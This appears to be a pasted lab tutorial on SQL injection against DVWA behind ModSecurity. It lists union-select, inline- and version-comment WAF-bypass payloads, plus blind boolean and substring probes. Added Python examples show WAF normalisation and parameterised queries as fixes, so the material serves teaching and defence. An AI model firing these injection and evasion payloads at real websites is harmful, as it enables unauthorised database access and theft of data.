Mukezh

Session Bypassing MOD_SECURITY

Jan 28th, 2019
Bypassing MOD_SECURITY
======================

Bypassing WAF Validations and Filters
-------------------------------------
Step 1: Attacking union-based injection on the WAF-protected website. (Note: open the IP address of the WAF.)
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1

Step 2: Produce an error (by adding an extra single quote).
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1'

Step 3: Let's try to get the total number of columns from the table behind the URL.
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 1--+
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 2--+
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 3--+

or in the input field: 1' order by 1#, 1' order by 2#, 1' order by 3#.

Step 4: Now that you know the number of columns, you can use a union select statement to find out which columns are vulnerable.

http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+
or
for the input field: 1' union select 1,2#


As you can see we are being blocked by the firewall. Let's understand how that happened.

Here we used "union", which is stored in the WAF's database as malicious input that should not come from a user. When the web server receives this request it is passed on to the WAF, where it is compared against the blacklist database; because it matched "union" in that database, the request was blocked.

union ---> Web Server ---> ModSecurity (list of malicious input words, which includes union) ---> X Blocked
  31.  
Bypassing Technique 1
Upper Lower Case Change

1. Upper Lower Case Method

union all select : UnIoN aLl SeLeCt

In the input field add the following:

1' uNiOn sEleCt 1,2#
The above statement would not work.

1' /*!union*/ /*!select*/ 1,2#
Inline comments: /*! */

Technique number 2: Inline Executable Comments
1' /*!union*/ /*!select*/ 1,2#


Step 2: 1' /*!union*/ /*!select*/ 1,/*!table_name*/ from /*!information_schema.tables*/#

Target table is users

Technique number 3: Version-Based Inline Executable Comments
------------------------------------------------------------
/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

MySQL versions
5.00.00 --> 50000
4.00.00 --> 40000
3.00.00 --> 30000
2.00.00 --> 20000
1.00.00 --> 10000

Step 3:
1' /*!50000union*/ /*!50000select*/ 1,/*!50000table_name*/ from /*!50000information_schema.tables*/#

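The three techniques above all rely on the WAF matching the raw parameter value while MySQL/MariaDB sees something different: a lowercase rule already catches the case-changing variant (which is why the notes say it does not work), but a rule looking for "union select" never sees that pair when each keyword is wrapped in a /*! */ executable comment. The following added example (not from these notes, and not ModSecurity's own code) models the transformations a WAF applies before matching, similar in spirit to ModSecurity's t:lowercase, t:removeComments and t:urlDecode transformation functions: URL-decode, unwrap the executable comments the way the database does, drop ordinary comments, lowercase and compress whitespace. It runs the notes' payloads through a lowercase-only filter and through the same rule after full normalisation. The rule, helper names and the list of payloads are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the original notes): a tiny model of how a WAF
# normalises a parameter value before matching a keyword rule, so that the
# case-changing and /*! ... */ inline-comment variants in the notes are seen
# as the plain "union select" they execute as in MySQL/MariaDB.
# The sample payloads are the ones from the notes; everything else is constructed.

# A deliberately simple blacklist rule: the UNION ... SELECT pair.
UNION_SELECT_RULE = re.compile(r"union\s+(?:all\s+)?select")

# /*!union*/ and /*!50000union*/ keep their body: MySQL executes the content
# of such comments (for the numbered form, when its version >= the number).
MYSQL_EXECUTABLE_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
# Ordinary /* ... */ comments are dropped entirely.
ORDINARY_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw: str) -> str:
    """WAF-style transformations: URL-decode, unwrap executable comments,
    drop ordinary comments, lowercase, compress whitespace."""
    value = unquote_plus(raw)                        # "+" and %XX as the server would decode them
    value = MYSQL_EXECUTABLE_COMMENT.sub(r"\1", value)
    value = ORDINARY_COMMENT.sub(" ", value)
    value = value.lower()
    return re.sub(r"\s+", " ", value).strip()


def naive_blocks(raw: str) -> bool:
    """A filter that only lowercases: stops UnIoN SeLeCt but not the comment tricks."""
    return bool(UNION_SELECT_RULE.search(raw.lower()))


def hardened_blocks(raw: str) -> bool:
    """The same rule applied after full normalisation."""
    return bool(UNION_SELECT_RULE.search(normalize(raw)))


# Payloads from the notes (values typed into the id field), plus a benign one.
PAYLOADS = [
    "1' union select 1,2#",
    "1' uNiOn sEleCt 1,2#",
    "1' /*!union*/ /*!select*/ 1,2#",
    "1' /*!50000union*/ /*!50000select*/ 1,/*!50000table_name*/ from /*!50000information_schema.tables*/#",
    "/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/",
    "1",
]

if __name__ == "__main__":
    print("naive hardened normalised value")
    for p in PAYLOADS:
        print(f"{naive_blocks(p)!s:5} {hardened_blocks(p)!s:8} {normalize(p)}")
```

The point for a defender is that the match must run on what the database will execute, not on the bytes the client sent; a rule set that lowercases but leaves comments in place is exactly the gap technique 2 and technique 3 walk through.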
  69.  
Blind SQL Injection
-------------------
Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response.

This attack is often used when the web application is configured to show generic error messages but the code that is vulnerable to SQLi has not been fixed.

This type of SQL injection is identical to normal SQL injection; the only difference is how the data is retrieved from the database.
1. Blind Boolean
2. Time Based SQL Injection


Demo
----

Step 3: As you can see, we get output as
1' and 1=0 # ---> False

1' and 1=1 # ---> True

1' and 1=0 order by 1 # --> No result ---> generic error

1' and 1=1 order by 1 # --> Result --> normal result

1' and 1=0 order by 2 # --> No result

So we can execute our statements, e.g.
Steps

Step 1:
1' and 1=1 order by 1 # -- data
1' and 1=1 order by 2 # -- data
1' and 1=1 order by 3 # -- no data; at this point you realise only two columns are present

Then you can go on executing union select statements

Step 2:
1' and 1=1 union select 1,2#

Substring and Blind Boolean Injection
-------------------------------------
We know that the attacker can ask true/false questions and the database will answer with 0 or 1, so we use substr here. substr is an SQL function that returns characters from a string, and we are basically asking whether the condition is true or false.

version() gives the version
version is 10.1.34-MariaDB

substr(version(),1,1)=1#
substr(version(), start index, number of characters from that index)

So the above statement selects only the character/number at index 1 and checks it. At index 1 '1' is present, so depending on whether the condition is true or false the database answers 1 or 0.


index 1 -> 1
index 2 -> 0
index 3 -> .
index 4 -> 1
index 5 -> .

Step 3: 1' and 1=1 union select 1,substr(version(),1,1)=1#

Answer 1 as the above condition is true


Similarly we can also ask something like

1' and 1=1 union select 1,substr(version(),3,1)='.'#
The above statement means: go to the version string and check whether the value at index 3 equals '.'. The version is 10.1.34-MariaDB and at index 3 there is a dot, so the condition is true and the database will answer 1.
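Every request in the Demo and Substring sections works only because the id value is concatenated into the SQL text, so "1' and 1=1" and "1' and 1=0" produce different results and the application becomes a true/false oracle. The fix is not at the WAF but in the query: bind the value as a parameter and both probes, and the union payload, are compared to user_id as a single string that matches nothing. The following added example (not DVWA's code, and not from these notes) puts the two lookups side by side against a constructed in-memory SQLite table; SQLite is used so it runs offline, and because its line comment marker is "--" rather than MySQL's "#", the notes' payloads are written with "--" at the end. The table rows, function names and payload constants are constructed for the example.

```python
import sqlite3

# Added example (not DVWA's code): the id= lookup from the notes, written once
# with string concatenation and once with a bound parameter, run against a
# constructed in-memory SQLite table. SQLite's comment marker is "--", so the
# payloads below end in "--" instead of MySQL's "#".


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown")],  # constructed rows
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """The pattern behind the notes' requests: the user value becomes SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """Bound parameter: the same value is only ever compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Payloads from the notes, with SQLite's comment marker.
UNION_PAYLOAD = "1' and 1=1 union select 1,2--"
TRUE_PROBE = "1' and 1=1--"
FALSE_PROBE = "1' and 1=0--"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", TRUE_PROBE, FALSE_PROBE, UNION_PAYLOAD):
        print(repr(value))
        print("  concatenated :", lookup_vulnerable(db, value))
        print("  parameterised:", lookup_safe(db, value))
```

With concatenation the true probe returns the admin row, the false probe returns nothing and the union payload adds the injected (1, 2) row; with the bound parameter all three return an empty result, which is what removes the oracle regardless of which keyword the WAF does or does not spot.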


Drive Link



https://drive.google.com/file/d/19umEKD0TfKwTbPL16RaTlyz0dMskINDb/view?usp=sharing